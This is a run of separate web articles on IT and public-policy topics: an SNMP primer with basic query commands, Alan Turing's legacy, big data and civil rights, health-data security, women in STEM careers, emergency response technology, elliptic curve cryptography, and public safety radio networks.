When you start reading about SNMP, you'll encounter all kinds of new terminology and abbreviations. There are three main pieces in an SNMP-managed network: network management systems (NMS), sometimes called managers, agents and your managed devices. Agents are software modules in managed devices; think of these as the go-betweens that handle communications between devices and managers. Because SNMP provides a common standard, theoretically all devices with SNMP agents can be managed by any SNMP-aware management applications. Messages originate from both ends: managers can query agents, and agents can volunteer information to managers.
Some devices have agents built-in, like managed switches, routers, printers, power supplies and network access points. You can also install SNMP agents on servers or workstations to monitor just about anything that is monitor-able: CPU temperature, services, database performance, disk space, network card performance — you name it.
There are three versions of SNMP: SNMPv1, SNMPv2, and (guess what!) SNMPv3. SNMPv1 is the most widespread, and probably will be for some time to come. The main objection to v1 is the lack of security; all messages are sent in cleartext. v2 was developed to add security, but it seems that development got a bit out of hand and we ended up with four versions:
- SNMPv2 "star", or SNMPv2*
SNMPv3 is supposed to restore order and sanity, and it is a nice implementation that is easier to use and has real security, so over time it should replace v1 and v2.
There is a common set of SNMP commands across all versions: read, write, and trap. You've probably heard of "SNMP traps". Your manager uses the read and write commands: it polls for device information, which is stored by the agents as variables, and writes commands to devices, which means altering the variables. Managed devices emit traps asynchronously, which means when they have something urgent to say they don't wait for the manager to ask them what's up. For example, a router will report that it has lost Internet connectivity, or a server that it is overheating and melting down. Your manager will capture the trap and ideally do something sensible in response.
The ingenuity of SNMP is that it doesn't require the managed devices to do anything other than report state, which places a trivial burden on them, and it uses the manager to do all the heavy lifting, like evaluating the information it collects and deciding what to do with it. The NMS doesn't issue commands, but rather re-writes variables. This can be a bit weird to wrap your mind around, but the result is a very flexible, low-overhead system that is easy to implement across all kinds of devices by different vendors, and on different platforms.
SMI and MIB
No, not Stylish Mullets Irresistible and Men In Black, but Structure of Management Information and Management Information Base. This is fancy talk for all those device variables and how they are stored. Agents each keep a list of objects that they are tracking; then your manager collects and uses this information in hopefully useful ways. SMI is the syntax or framework used to define objects; MIB is the definitions for specific objects. Every object gets a unique Object Identifier (OID). These are managed in the same way as MAC addresses, with a central registry and unique allocations to hardware vendors.
All versions of SNMP use these five messages: GetRequest, GetNextRequest, SetRequest, GetResponse and Trap, which I believe explain themselves. SNMPv2 uses different message formats and protocol operations than v1, which pretty much renders it non-interoperable with v1. However, there are workarounds. Some managers support both v1 and v2, or your v2 agents can act as v1 proxies. This means they translate messages between the manager and agent so that v1 devices can understand them.
RMON, or Remote Monitoring, is part of SNMP. It is an MIB module that defines a set of MIB objects for use by network monitoring probes. The SNMP framework is made up of dozens of MIB modules. Some are freely available, some are deep dark proprietary secrets, and of course you can always write your own. (See Resources for the online MIB validator, and to download MIBs.)
SNMP In Action
In future articles we'll dig into how to use SNMP with Linux-based network management applications. Until then, you can play around with SNMP to see what it looks like. On Debian, install the snmp and snmpd packages. On Fedora, net-snmp-utils and net-snmp. The installers should start up the snmp daemon automatically. Then run this command:
#snmpwalk -v 1 -c public localhost system
This should spit out a bunch of output that looks something like this:
SNMPv2-MIB::sysORLastChange.0 = Timeticks: (32) 0:00:00.32
SNMPv2-MIB::sysORID.1 = OID: IF-MIB::ifMIB
SNMPv2-MIB::sysORID.2 = OID: SNMPv2-MIB::snmpMIB
SNMPv2-MIB::sysORID.3 = OID: TCP-MIB::tcpMIB
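Once that works, you can query a single object directly with snmpget; for example, to fetch the system uptime:

#snmpget -v 1 -c public localhost sysUpTime.0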
Of course the man pages will tell you how to do more fun things, and the excellent O'Reilly book "Essential SNMP, 2nd Edition" by Douglas Mauro and Kevin Schmidt is a great practical guide to understanding and using SNMP.
Want to read the SNMP RFCs? Really? Well, allrighty then. Start here at this handy partial table of the relevant RFCs: | <urn:uuid:5f105bda-870b-49c1-abd0-8c89b4c74a45> | CC-MAIN-2017-04 | http://www.enterprisenetworkingplanet.com/print/netsysm/article.php/3660916/SNMP-for-Everybody.htm | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560284352.26/warc/CC-MAIN-20170116095124-00359-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.921698 | 1,494 | 2.578125 | 3 |
On Saturday, British mathematician Alan Turing would have turned 100 years old. It is barely fathomable to think that none of the computing power surrounding us today was around when he was born.
But without Turing's work, computers as we know them today simply would not exist, Robert Kahn, co-inventor of the TCP/IP protocols that run the Internet, said in an interview. Absent Turing, "the computing trajectory would have been entirely different, or at least delayed," he said.
For while the idea of a programmable computer has been around since at least 1837 -- when English mathematician Charles Babbage formulated the idea of his analytical engine -- Turing was the first to do the difficult work of mapping out the physics of how the digital universe would operate. And he did it using a single (theoretical) strip of infinite tape.
"Turing is so fundamental to so much of computer science that it is hard to do anything with computers that isn't some way influenced by his work," said Eric Brown, who was a member of the IBM team that built the "Jeopardy"-winning Watson supercomputer.
A polymath of the highest order, Turing left a list of achievements stretching far beyond the realm of computer science. During World War II, he was instrumental in cracking German encrypted messages, allowing the British to anticipate Germany's actions and ultimately help win the war. Using his mathematical chops, he also developed ideas in the field of non-linear biological theory, which paved the way for chaos and complexity theories. And to a lesser extent he is known for his sad demise, an apparent suicide after being persecuted by the British government for his homosexuality.
But it may be computer science where his legacy will be the most strongly felt. Last week, the Association for Computing Machinery held a two-day celebration of Turing, with the computer field's biggest luminaries -- Vint Cerf, Ken Thompson, Alan C. Kay -- paying tribute to the man and his work.
Turing was not alone in thinking about computers in the early part of the past century. Mathematicians had been thinking about computable functions for some time. Turing drew from colleagues' work at Princeton University during the 1930s. There, Alonzo Church was defining the lambda calculus (which later formed the basis of the Lisp programming language), and Kurt Gödel worked on the incompleteness theorems and recursive function theory. Turing employed the work of both mathematicians to create a conceptual computing machine.
His 1936 paper described what would later become known as the Turing Machine, or a-machine as he called it. In the paper, he described a theoretical operation that used an infinitely long piece of tape containing a series of symbols. A machine head could read the symbols on the tape as well as add its own symbols. It could move about to different parts of the tape, one symbol at a time.
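In modern terms the a-machine is easy to sketch in code. Here is a minimal simulator in Python (the rule table below is hypothetical, chosen only to illustrate the read-write-move cycle):

# A Turing machine: a tape of symbols, a head position, a state, and a
# rule table mapping (state, symbol) -> (write, move, next state).
def run(tape, rules, state='start', blank='_'):
    cells = dict(enumerate(tape))  # sparse tape, extendable in both directions
    pos = 0
    while state != 'halt':
        symbol = cells.get(pos, blank)
        write, move, state = rules[(state, symbol)]
        cells[pos] = write
        pos += 1 if move == 'R' else -1
    return ''.join(cells[i] for i in sorted(cells))

# Example rules: flip every bit until a blank cell is reached.
rules = {('start', '0'): ('1', 'R', 'start'),
         ('start', '1'): ('0', 'R', 'start'),
         ('start', '_'): ('_', 'R', 'halt')}
print(run('1011', rules))  # prints 0100_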
"The Turing machine gave some ideas about what computation was, what it would mean to have a program," said James Hendler, a professor of computer science at the Rensselaer Polytechnic Institute and one of the instrumental researchers of the semantic Web. "Other people were thinking along similar lines, but Turing really put it in a formal perspective, where you could prove things about it."
On its own, a Turing Machine could never be implemented. For one, "infinite tapes are hard to come by," Kahn joked. But the concept proved invaluable for the ideas it introduced into the world. "Based on the logic of what was in the machine, Turing showed that any computable function could be calculated," Kahn said.
Today's computers, of course, use binary logic. A computer program can be thought of as an algorithm or set of algorithms that a compiler converts into a series of 1's and 0's. In essence, they operate exactly like the Turing Machine, absent the tape.
"It is generally accepted that the Turing Machine concept can be used to model anything a digital computer can do," explained Chrisila Pettey, who heads the Department of Computer Science at Middle Tennessee State University.
Thanks to Turing, "any algorithm that manipulates a finite set of symbols is considered a computational procedure," Pettey said in an interview via email.
Conversely, anything that cannot be modeled in a Turing Machine could not run on a computer, which is vital information for software design. "If you know that your problem is intractable, and you don't have an exponential amount of time to wait for an answer, then you'd better focus on figuring out a way to find an acceptable alternative instead of wasting time trying to find the actual answer," Pettey said.
"It's not that computer scientists sit around proving things with Turing Machines, or even that we use Turing Machines to solve problems," Pettey said. "It's that how Turing Machines were used to classify problems has had a profound influence on how computer scientists approach problem solving."
At the time Turing sketched out his ideas, the world had plenty of pretty sophisticated adding machines that would allow someone to perform simple calculations. What Turing offered was the idea of a general-purpose programmable machine. "You would give it a program and it would do what the program specified," Kahn explained.
In the next decade, another polymath, John von Neumann, at the Princeton Institute for Advanced Study, started working on an operational computer that borrowed from Turing's idea, except it would use random access memory instead of infinite tape to hold the data and operational programs. Called MANIAC (Mathematical Analyzer, Numerical Integrator, and Computer), it was among the first modern computers ever built and was operational in 1952. MANIAC used what is now called the Von Neumann architecture, the model for all computers today.
Returning to Britain after his time at Princeton, Turing worked on another project to build a computer that used these concepts, called the Automatic Computing Engine (ACE), and pioneered the idea of a stored memory machine, which would become a vital part of the Von Neumann architecture.
As well as sparking the field of computer science, Turing's work on cracking encryption may ultimately have saved Great Britain from becoming a German colony. People have argued that his work defining computers was essential to his success in breaking the encryption generated by Germany's Enigma machine -- work that helped bring World War II to an end.
"By today's definitions, the Enigma was an analog computer. What he [and his team] built was much closer to [the operations] of a digital computer," Rensselaer's Hendler explained. "Essentially he showed the power of digital computing in attacking this analog problem. This really changed the whole way that the field thought about what computers could do."
Having defined computational operations, Turing went on to play a fundamental role in defining artificial intelligence -- or computer intelligence that mimics human thinking. In 1950, he authored a paper that offered a way to determine if a computer possessed human intelligence. The test involves a person having an extended conversation with two hidden entities, a computer and a man pretending to be a woman. ("In both cases he wanted pretending," Hendler explained.) If the person can't determine which party is the computer, the machine can be said to think like a human.
"He wanted to put human and computing on equal footing," Hendler said. "Language is a critical skill for humans because it requires understanding and context. If a computer showed that level of understanding then you wouldn't notice the difference."
The test "has the advantage of drawing a fairly sharp line between the physical and the intellectual capacities of a man," Turing wrote in the original paper.
As IBM's Brown noted, Turing's legacy is still strongly felt today. In his mathematics work, he showed that "there exists problems that no decision process could answer," Hendler said. In terms of computers, this means, "You could never prove for all complicated computer programs that they are correct," Hendler said. "You could never write a computer program that could debug all other computer programs."
But far from restricting progress of computer science, the knowledge of such inconclusiveness paved the way for building previously unimagined technologies. It allowed engineers to create immensely helpful services such as Internet search engines, despite knowing that the answers such services were to provide would not always be complete.
"You have people who say we should never build a computing system unless we can prove it is secure. Those of us who understand Turing say, 'Well, you can't.' So you must start proving some approximation of secure, which starts a very different conversation," Hendler said.
And despite numerous attempts to beat the Turing Test, it still hasn't been done, except within the most limited of topics. That means we will likely be working to meet Turing's benchmarks for years to come.
"You can't say, 'Siri. How are you today?' and expect it to go on from there in any interesting way," Hendler said. | <urn:uuid:cf898608-7feb-47cd-82f7-89cc86dcc410> | CC-MAIN-2017-04 | http://www.itworld.com/article/2722685/it-management/how-alan-turing-set-the-rules-for-computing.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279657.18/warc/CC-MAIN-20170116095119-00021-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.973537 | 1,849 | 3.65625 | 4 |
A new report on the big data analytics sector from the White House has warned businesses that they must consider the ethical implications of their deployments and ensure that they are not discriminating against any individuals through their use of data.
The study, titled "Big Data: A Report on Algorithmic Systems, Opportunity, and Civil Rights," noted that if used correctly, big data can be an invaluable tool in overcoming longstanding biases and revisiting traditional assumptions.
For instance, by stripping out information such as race, national origin, religion, sexual and gender orientation, and disability, big data solutions have the potential to prevent discriminatory harm when it comes to activities such as offering employment, access to finance or admission to universities. However, the report warned that if care is not taken with the implementation of these technologies, they could exacerbate any problems.
One of the big challenges is that despite what many people assume, big data is not necessarily impartial. It can be subject to a range of issues such as imperfect inputs, poor logic and the inherent biases of the programmer.
"Predictors of success can become barriers to entry; careful marketing can be rooted in stereotype. Without deliberate care, these innovations can easily hardwire discrimination, reinforce bias, and mask opportunity," the study stated.
For instance, poorly selected data, incomplete or outdated details and unintentional historical biases could all result in the wrong data being input into big data systems. Meanwhile, poorly designed algorithms can also cause problems if they assume correlation equals causation, or if personalised recommendations use too narrow a set of criteria to infer a user's true preferences.
The report highlighted several case studies that illustrate how big data can be used to improve outcomes – as well as some of the pitfalls that need to be avoided.
For example, it noted that many people in the US have difficulty gaining access to finance because they have limited or non-existent credit files. This is an issue that particularly affects African-American and Latino individuals, who are nearly twice as likely to be 'credit invisible' than whites.
Big data presents a great opportunity to improve access to credit, as it can draw on many more sources of information in order to build a picture of an applicant. This may range from phone bills, previous addresses and tax records to less conventional sources, such as location data derived from use of cellphones, social media data and even how quickly an individual scrolls through a personal finance website.
However, it warned: "While such a tool might expand access to credit for those underserved by the traditional market, it could also function to reinforce disparities that already exist among those whose social networks are, like them, largely disconnected from everyday lending.
"If poorly implemented, algorithmic systems that utilise new scoring products to connect targeted marketing of credit opportunities with individual credit determinations could produce discriminatory harms."
The report also included a number of recommendations for improving big data outcomes, such as increasing investments in research, improving training programmes, and developing clear standards for both the public and private sector.
"Big data is here to stay; the question is how it will be used: to advance civil rights and opportunity, or to undermine them," it added. | <urn:uuid:1c6095ab-1de9-4356-b514-048e72177fa1> | CC-MAIN-2017-04 | http://kognitio.com/white-house-warns-on-big-data-risks/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280292.50/warc/CC-MAIN-20170116095120-00507-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.946827 | 640 | 2.765625 | 3 |
In 2011, we saw a huge increase in the number of major breaches of Protected Health Information (PHI) due to the loss or theft of unencrypted devices. The largest of these breaches was experienced by Sutter Health of California which suffered the theft of a computer containing more than four million patient records. The data for about 3.3 million of these patients included their names, addresses, dates of birth, phone numbers and email addresses. The remaining 943,000 records also contained medical diagnoses and services provided.
With such a huge risk of data loss from just one end-user device, it may be a good time to reevaluate the client/server infrastructure in the offices of healthcare providers.
Server-based computing has been around seemingly forever. Anyone who has ever interacted with a "terminal" or "green screen" has used server-based computing. There was no data processing or storage on the end-user device; it was all handled by the server on the other end of the connection.
The advent of PC-based computing, especially in private physician practices, came about largely because end users needed more functionality than a terminal alone could provide, and also because it became increasingly difficult to purchase replacements for failed devices. Unfortunately, the adoption of PCs in medical practices has contributed heavily to the decline in the overall security of patient information.
Server-based computing can really be thought of as a "remote desktop." The desktop that you are interacting with is actually hosted on another system in a remote location. Depending on the type of system that is implemented, the desktop will provide the end user with either dedicated or shared computing resources such as memory, processor and storage.
The traditional server-based computing systems from Citrix and Microsoft are systems that share computing resources among the connected users. Because of limited server resources and the need for high availability, these systems provide end users with limited customization, and system maintenance can affect a large number of those users.
A growing technology, VDI or Virtual Desktop Infrastructure, is another type of server-based computing system that provides dedicated computing resources to the end user. This means that a user is provided with a remote desktop session into a dedicated operating system with dedicated processor, memory and storage. With the resources being dedicated, the user has the ability to make customizations that would not be possible on a shared-resource system. Any issue with the system that requires troubleshooting by the IT staff affects only that end user and no one else, as this is an isolated system.
This solution helps fulfill some of the regulatory requirements for data security because:
- The centralized data processing and storage capability allows end users to use "thin" devices that are not capable of data storage. This removes the possibility that patient information can be accidentally or maliciously stored on an end user device.
- The server-based computing infrastructure is in a central location (main office, datacenter, etc.) so the physical access to these systems is limited.
For more information on ePHI, read my previous post: "Do you know where your ePHI is?"
Chris Cline is a Senior Sales Engineer at mindSHIFT Technologies, Inc., based in our Morrisville, NC office. | <urn:uuid:afaec230-cfbc-4af9-8f5a-b5e1bcfd6b0e> | CC-MAIN-2017-04 | http://www.mindshift.com/Blog/2012/February/Securing-ePHI-with-Server-Based-Computing.aspx | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280891.90/warc/CC-MAIN-20170116095120-00323-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.94881 | 670 | 2.59375 | 3 |
What if half the men in science, engineering and technology roles dropped out at midcareer? That would surely be perceived as a national crisis. Yet more than half the women in those fields leave -- most of them during their mid- to late 30s.
In this month's Harvard Business Review, Sylvia Ann Hewlett, Carolyn Buck Luce and Lisa J. Servon describe the Athena Factor, their research project examining the career trajectories of such women. Hewlett, founding president of the Center for Work-Life Policy in New York, told Kathleen Melymuka about what they learned.
Your research shows that there are more women on the lower rungs of science and technology fields than most people suspect.

Women are actually excelling in science, engineering and technology, despite the fact that the schools are not very good at encouraging them. Many don't just survive the educational process but get some distance in terms of careers. The story is very encouraging in the early run. Between ages 25 and 30, 41% of the young talent with credentials in those subject matters are female. It's a more robust figure than many suspect. That's the good news.
What happens later?

The bad news is that a short way down the road, 52% of this talent drops out. We are finding that attrition rates among women spike between 35 and 40 -- what we call the fight-or-flight moment. Women vote with their feet; they get out of these sectors. Not only are they leaving technology and science companies, many are leaving the field altogether.
How many women are we talking about?

We reckon that maybe a million well-qualified women are dropping out in that age range. We reckon that if you could bring the attrition rate down by 25%, you would hang on to about a quarter of a million women with real experience and credentials in these fields -- fields that are suffering a labor shortage.
Based on the demographics, it seems likely that they leave to start families. Is that what happens?

No. I'm not trying to pretend that work-life balance is not important, but we found four other more important factors about the culture and the nature of the career path. We call them "antigens," because they repel women.
Tell me about those.

The most important antigen is the machismo that continues to permeate these work environments. We found that 63% of women in science, engineering and technology have experienced sexual harassment. That's a really high figure.
They talk about demeaning and condescending attitudes, lots of off-color jokes, sexual innuendo, arrogance; colleagues, particularly in the tech culture, who genuinely think women don't have what it takes -- who see them as genetically inferior. It's hard to take as a steady stream. It's predatory and demeaning. It's distressing to find this kind of data in 2008.
Is this data global or national?

We studied private-sector employers in the U.S., and then we looked at three large, global companies with women working across the world. We also did a bunch of focus groups in Australia, Shanghai and Moscow. The data were pretty consistent. Actually, India is a little better than the U.S. But there's not much variation across geography.
Rising waters overflow stream and river banks, masses of mud slide over freeways, and snow piles so high, it causes power outages and forces road closures. Last winter, dozens of news reports told of families stranded or left homeless, property wrecked and muddied by flood waters, houses crunched by fallen trees, and pets and livestock abandoned by owners forced to evacuate.
With all of the subsequent cries for help from victims of floods, blizzards, hurricanes, fires and earthquakes, emergency response agencies had to be on alert and well-prepared. Many agencies rose out of the chaos and helped increase public confidence. One such agency was the California Office of Emergency Services (OES), which successfully responded to the Sacramento Valley floods of '97. One of the heroes that shined during this tense situation wasn't a person but a system -- the Response Information Management System (RIMS), which consists of 10 to 15 servers, 500 to 800 PCs and multiple, redundant communication networks.
"The most important function of an emergency response organization is being able to coordinate, allocate and move resources to get help to those who need it as fast as possible," said John Bowles, chief of the information branch of OES. "Technology helped us to do that."
RIMS is an example of how technology, correctly applied, helps government agencies effectively respond to and manage emergency situations. Agencies that haven't put an effective system in place, or that are looking to upgrade or expand an existing one, will be overwhelmed by the many products available. All one has to do is perform a Net search and plug in the words "computer-aided dispatch" and "emergency response" to uncover literally hundreds of companies and products. So here is a rundown of some of the latest products and techniques helping to save lives.
Lotus Notes -- a component of the OES RIMS system -- is a pro at helping agencies manage and coordinate workflow during emergencies. The program's interface makes information easy to find and accessible on the fly by allowing users to point and click to retrieve data. It integrates information from a number of sources, allowing agencies with different applications to share information within the Notes system. It also combines information from desktop applications, relational databases, legacy systems and the Internet.
In an emergency situation, users who deal with hundreds of resource requests simultaneously are able to use these tools to respond, manage and coordinate requests faster and more effectively.
The program also makes it easy to automate business processes, because it's a distributed knowledge system. It features tools to build workflow applications that route information and store content and logic of the work. During an emergency, proper workflow management allows users to send resource requests automatically through a standard process and reduce processing time.
The database gives users the ability to assemble, manage and share compound documents. Information generated from the Internet, relational databases and legacy systems can be integrated into a Notes document. Users can also embed objects, sound, video and data in a document. Teams can then quickly communicate and share knowledge. This also provides accuracy, as a team can determine what occurred during an emergency effort and a chronology of events -- a clear historical record of when actions were taken.
Lotus Notes also offers dozens of other features that help teams create applications to suit a particular disaster, design applicable time reporting, fiscal tracking, inventory management programs and more.
For further details, contact Paul Christman, state and local sales manager for Lotus, at 800/346-1347.
Hit The Spot
For up-to-the-minute overhead images for use during fires and floods, Spot Image offers an array of system services to provide assistance. Spot satellite programming services feature mapping production and updating, cropping patterns, digital elevation models, contour lines, slope and insolation maps and more. The satellites keep a constant eye on the Earth's surface from its orbit more than 500 miles overhead. For example, after a fire, Spot can provide rapid response imagery to help officials map out the extent of the damage by providing an image that might show the area covered by a fire scar.
Users can select Spot's programming service by purchasing different packages, which include red, blue, stereo and turnkey services. Red service provides users with exclusive rights to the number of imaging attempts needed for their studies, situation analysis, monthly reports on imaging attempts and more; blue service is used for non-urgent requests; stereo service is for acquiring Spot stereopairs or stereoscopic coverage of broad areas; and turnkey services offer hands-on support for single images or an entire project.
For more information, contact Spot Image Corp., 1897 Preston White Dr., Reston, VA 22091. Call 703/715-3137 or send e-mail to email@example.com.
Public Safety and More
International Public Safety (formerly Intergraph Public Safety) has long been a provider of emergency response systems to state and local governments. It offers a wide range of applications, from I/Management and Reporting System (I/MARS) to I/Calltaker, and from I/Dispatcher to I/Computer Aided Dispatch system (I/CAD).
I/MARS allows users to extract data from various systems and turn that data into information. It can assimilate data from a variety of sources in existing systems and integrate it with the I/MARS programs. In turn, this information can be presented in many forms, including charts, maps, graphs and reports. When an accident occurs, reliable information about the time and place of the incident can be provided for informed decision-making. This information can then be compiled and used for analysis. For example, although you cannot predict when a specific accident might happen in a traffic intersection, you can use the system to calculate the probability of it happening on a specific day at a specific hour.
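The calculation described is, at heart, empirical frequency estimation from historical counts. A toy sketch in Python (the numbers are invented, not drawn from I/MARS):

```python
# Toy example: estimate the chance of an accident at one intersection
# during the Friday 5 p.m. hour, from two years of (invented) records.
weeks_of_history = 104
accidents_in_slot = 13    # accidents logged in that weekday/hour slot

probability = accidents_in_slot / weeks_of_history
print(f"Estimated probability: {probability:.1%}")   # 12.5%
```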
I/Calltaker performs call-taking and incident-entry functions in all public safety dispatch environments. I/Calltaker allows each agency's communication center to customize forms to accommodate its own way of gathering and reporting data. An on-screen form shows operators what information to record while the automatic number identification and automatic location information program takes data from the Enhanced 911 telephone database and loads it into the form. Some of its other functions include event location processing, customization of event types, areas for dispatchers to make remarks associated with the emergency and the ability to check the location of the event.
Considered the hub of Intergraph's safety solutions, I/CAD helps dispatchers make better judgment calls when dispatching resources in an emergency. It features incident entry, two-way communication with mobile resource units in the field, and provides a single system to store, use and report information including addresses, incident histories, hospital downtime and unit activities. It also features fully interactive maps that include information on streets, highways, building blueprints, HAZMAT flags, fire hydrants, power lines, rivers, lakes, railroad lines and more. An operator can query the system and route units to locations by the shortest time, distance, fewest turns or intersections and other criteria.
For more information, contact International Public Safety at 800/345-4856 or visit its Web site at http://www.intergraph.com.
Calls From The Field
Communication is probably one of the most important elements in any emergency situation. Emergency crews have to be able to call in and get accurate directions during a crisis. This is why a top-notch, reliable cellular phone is crucial during disasters of any kind. Perhaps one of the most popular cellular phone product lines comes from Motorola. It offers an extensive line of cellular phones to meet a variety of needs, including the StarTAC 8600, the Profile Series 300, the Secure Clear models 3325 and 3367, and the Populous.
The StarTAC 8600 is a wearable model that weighs 3.1 ounces and offers an answering machine/voice recorder function. VoiceNote provides up to four minutes of record time and acts as a kind of voice memo system. It also features two removable Lithium Ion batteries for 51 hours of standby time, a VibraCall alert feature to receive incoming calls, a headset jack for use with an optional headset and a portfolio of accessories.
The Profile Series 300 features an enlarged, two-line display that uses graphic elements such as dedicated battery and signal meters. It also features nine Turbo Dial locations, a headset jack, data capabilities and a car kit. It boasts up to 70 minutes of talk time and 12 hours of standby time with a Nickel Metal Hydride battery. For added security, it can be programmed with a PIN code for markets that offer this service.
If security is a concern, check out the Secure Clear models 3325 and 3367, which offer caller ID and call waiting to identify incoming and outgoing callers. These phones feature backlit display and keypad; a 20-character, two-line display that shows name, number, date and time; 50 caller-ID records; and 25-channel automatic scanning.
Motorola's latest addition to their cellular family is the Populous, a slim phone that weighs just 8.2 ounces and runs off a NiCd battery pack. It features a large keypad, colorful display, simplified programming, nine selectable ringer tones, TurboDial keys, a built-in battery meter and fraud protection. Other advantages include a charging time of 1.5 hours, 180 minutes of talk time or 30 hours of standby time, the ability to use four standard AA batteries and more.
For further details, contact Motorola Cellular Subscriber Sector, 600 N. U.S. Highway 45, AN482, Libertyville, IL 60048. Call 800/331-6456 or visit its Web site at http://www.startac.com.
Michelle Gamble-Risley is the publisher of California Computer News. E-mail: firstname.lastname@example.org.
Recently, there have been many advances in cracking encryption algorithms that are the basis for the most common cryptography systems, such as Diffie-Hellman, RSA and DSA. Experts warn that within the next several years, the RSA public key cryptography system could even potentially become obsolete. If that is the case, how will enterprises be able to ensure secure remote access in the near-future?
First, let’s take a look at the problem itself. Encryption algorithms ensure security by relying on the assumption that certain mathematical operations, such as integer factorization and the discrete logarithm, are computationally infeasible to reverse, which prevents recovery of private keys. As the key length increases, breaking the key becomes exponentially harder, which is why symmetric keys today are typically 128 bits or more and RSA keys run to 2,048 bits or longer.
After more than 30 years of little progress, researchers have recently started creating faster algorithms for limited versions of the discrete logarithm problem, which has rung the alarm for the entire cryptographic community. It has made us realize that we need to implement a more secure standard, Elliptic Curve Cryptography (ECC).
ECC is the best option moving forward for secure remote access via VPNs, because it is based on an operation that not only is difficult to solve but also is a very different problem from the discrete logarithm and integer factorization. Due to its unique characteristics, it is not impacted by advances in decrypting cryptography systems that utilize either of those problems. Currently, ECC is still not widely in use, but that is starting to change. It is particularly important for enterprises to implement ECC over the next several years to improve network security, because if decryption advances proceed at the current rate, TLS, a common protocol that ensures secure communications over the Internet, will be vulnerable to hackers until TLS 1.2, which includes ECC support, becomes widely available. If TLS communications can be decrypted, hackers could steal sensitive data, such as corporate financial information and documents, or even gain complete access to a corporate network to bring it down from the inside.
Implementing ECC right now will ensure that the worst case scenario will not happen. It’s time for enterprises to stay ahead of the curve, and use ECC to protect remote access to their corporate networks.
This post originally appeared on VPNHaus.com. | <urn:uuid:d681f310-51d3-4a1c-b2e3-c5b2e39f16bb> | CC-MAIN-2017-04 | http://infosecisland.com/blogview/23360-Why-Elliptic-Curve-Cryptography-is-Necessary-for-Secure-Remote-Access.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280791.35/warc/CC-MAIN-20170116095120-00526-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.950574 | 482 | 3.125 | 3 |
Police officers and firefighters carry $5000 radios. Local and state governments spend hundreds of millions of dollars to build public safety radio networks. Yet, today, cell phone networks seem to be everywhere, most people carry a mobile phone and many of us think paying $199 for an iPhone is expensive.
Why can't cops and firefighters and emergency medical technicians (EMT) use cell phones like everyone else? A Washington State legislator from Seattle recently publicly argued for this approach on his blog. And, at first, this appears to be a simple way for governments to save a lot of taxpayer dollars.
Here are a few reasons public safety officers need their own dedicated networks:
- Priority. Cellular networks do not prioritize their users or traffic. A teenager's cell phone has the same priority as a cell phone used by a police officer or, for that matter, the BlackBerry used by President Obama. We've all experienced "no circuits available" or "network busy" when using a cell phone. When I'm being assaulted or have been injured in an automobile accident or even have had my house burglarized, the last thing I want is for the network to be "busy" so a police officer or EMT couldn't be dispatched. Public safety needs dedicated frequencies where police officers and firefighters have priority and even, perhaps, exclusive rights of use, without calls being clogged by the public.
- Reliability. Seattle's public safety radio network, part of the larger King County-wide 800 megahertz public safety radio network, handles more than 60,000 police, fire and emergency medical calls every day. It operated last year with 99.9994% reliability - that's about 189 seconds of downtime out of the more than 31 million seconds that composed the year 2009 (the arithmetic is checked in the sketch after this list). On average, only about five out of the 60,000 calls were delayed for any reason, and even then the average delay was about two seconds. What cell phone network has that kind of reliability? How many times have you experienced "no service" or "call dropped" with your cell phone? Do we want firefighters who are reviving a heart attack victim and talking to the emergency room on the radio to all-of-a-sudden have their call dropped? Or should police officers lose service when drunk drivers clog the roads and bars are closing at 2:00 AM because a cell phone company decides to do maintenance because "no one uses the network then"?
- Disasters. Even small disasters cause cell phone networks to collapse. In Seattle, we've had SWAT team actions or car accidents which have shut down a freeway. Suddenly cell phone service abruptly ceases in that area because EVERYONE is on their phone. A few years ago a rifleman was loose and shooting people in the Tacoma Mall. Responding police and EMTs had communications because they had dedicated networks and frequencies, but again cell phone networks were overloaded and down. In a larger disaster such as an earthquake or hurricane (with associated evacuation of large cities), commercial networks will be overloaded or jammed for days by people trying to escape the affected areas. Do we want police and fire departments - or even transportation, electric utilities and public works departments - to be trying to use those same networks while they are responding to the disaster? I don't think so.
- Talk-around. A key feature of most government-operated networks is something called talk-around or simplex or "walkie-talkie" mode. In this mode, individual radios talk directly to each other, without using a radio or cell tower. This is very important at incident scenes - firefighters commonly use it at the scene of a fire, because the radios will operate at the scene even if there isn't a tower nearby. But this is NEVER a feature of cellular phone networks. If the cell tower is down or out of range, that cell phone in your hands is a useless lump of plastic. But the radios of public safety officers still work and will talk to each other even without the tower.
- Ruggedness. No firefighter in his/her right mind would fight a fire using a cell phone for communications. The heat, water and ruggedness of the environment would quickly destroy the device. Yet most public safety radios will survive being dropped repeatedly on the ground or being immersed in water for 30 minutes or more. No standard cell phone can survive the rigorous work of firefighting or policing.
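As a quick check of the reliability arithmetic cited in the list above (using a 365-day year):

```python
seconds_per_year = 365 * 24 * 60 * 60           # 31,536,000 seconds in 2009
availability = 0.999994
downtime = seconds_per_year * (1 - availability)
print(round(downtime), "seconds of downtime")   # ~189 seconds
```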
Are there problems with the current dedicated public safety networks? Absolutely. They use proprietary technologies, for example "Project 25". Theoretically, all "Project 25" radios work on any "Project 25" radio system, but only a few of those systems are deployed around the nation. These proprietary technologies are one reason the radios cost up to $5,000 each.
Representative Carlyle, in his blog, proposes that we deploy "Tetra" radios for public safety. While Tetra is common in some parts of the world, it is not used at all in the United States. This is a dangerous proposal, because it means the Tetra networks we buy would not work with the equipment used by any other government or telecommunications carrier anywhere in the United States. If called to respond to a disaster overseas, we could talk to firefighters in Hong Kong or the police in Ireland, however.
Another problem we face is the small market - the total market for public safety is perhaps 10,000,000 radios which are replaced, say, once every 10 years. On the other hand, the cell phone market is huge - 260 million cell phones replaced every two years in the United States alone. The economies of scale means consumers will have a lot more choice, and their cell phones will be relatively cheap.
So is there some way to reduce the sky-high cost of these dedicated public safety networks while at the same time not endangering cops, firefighters, EMTs and the public in general?
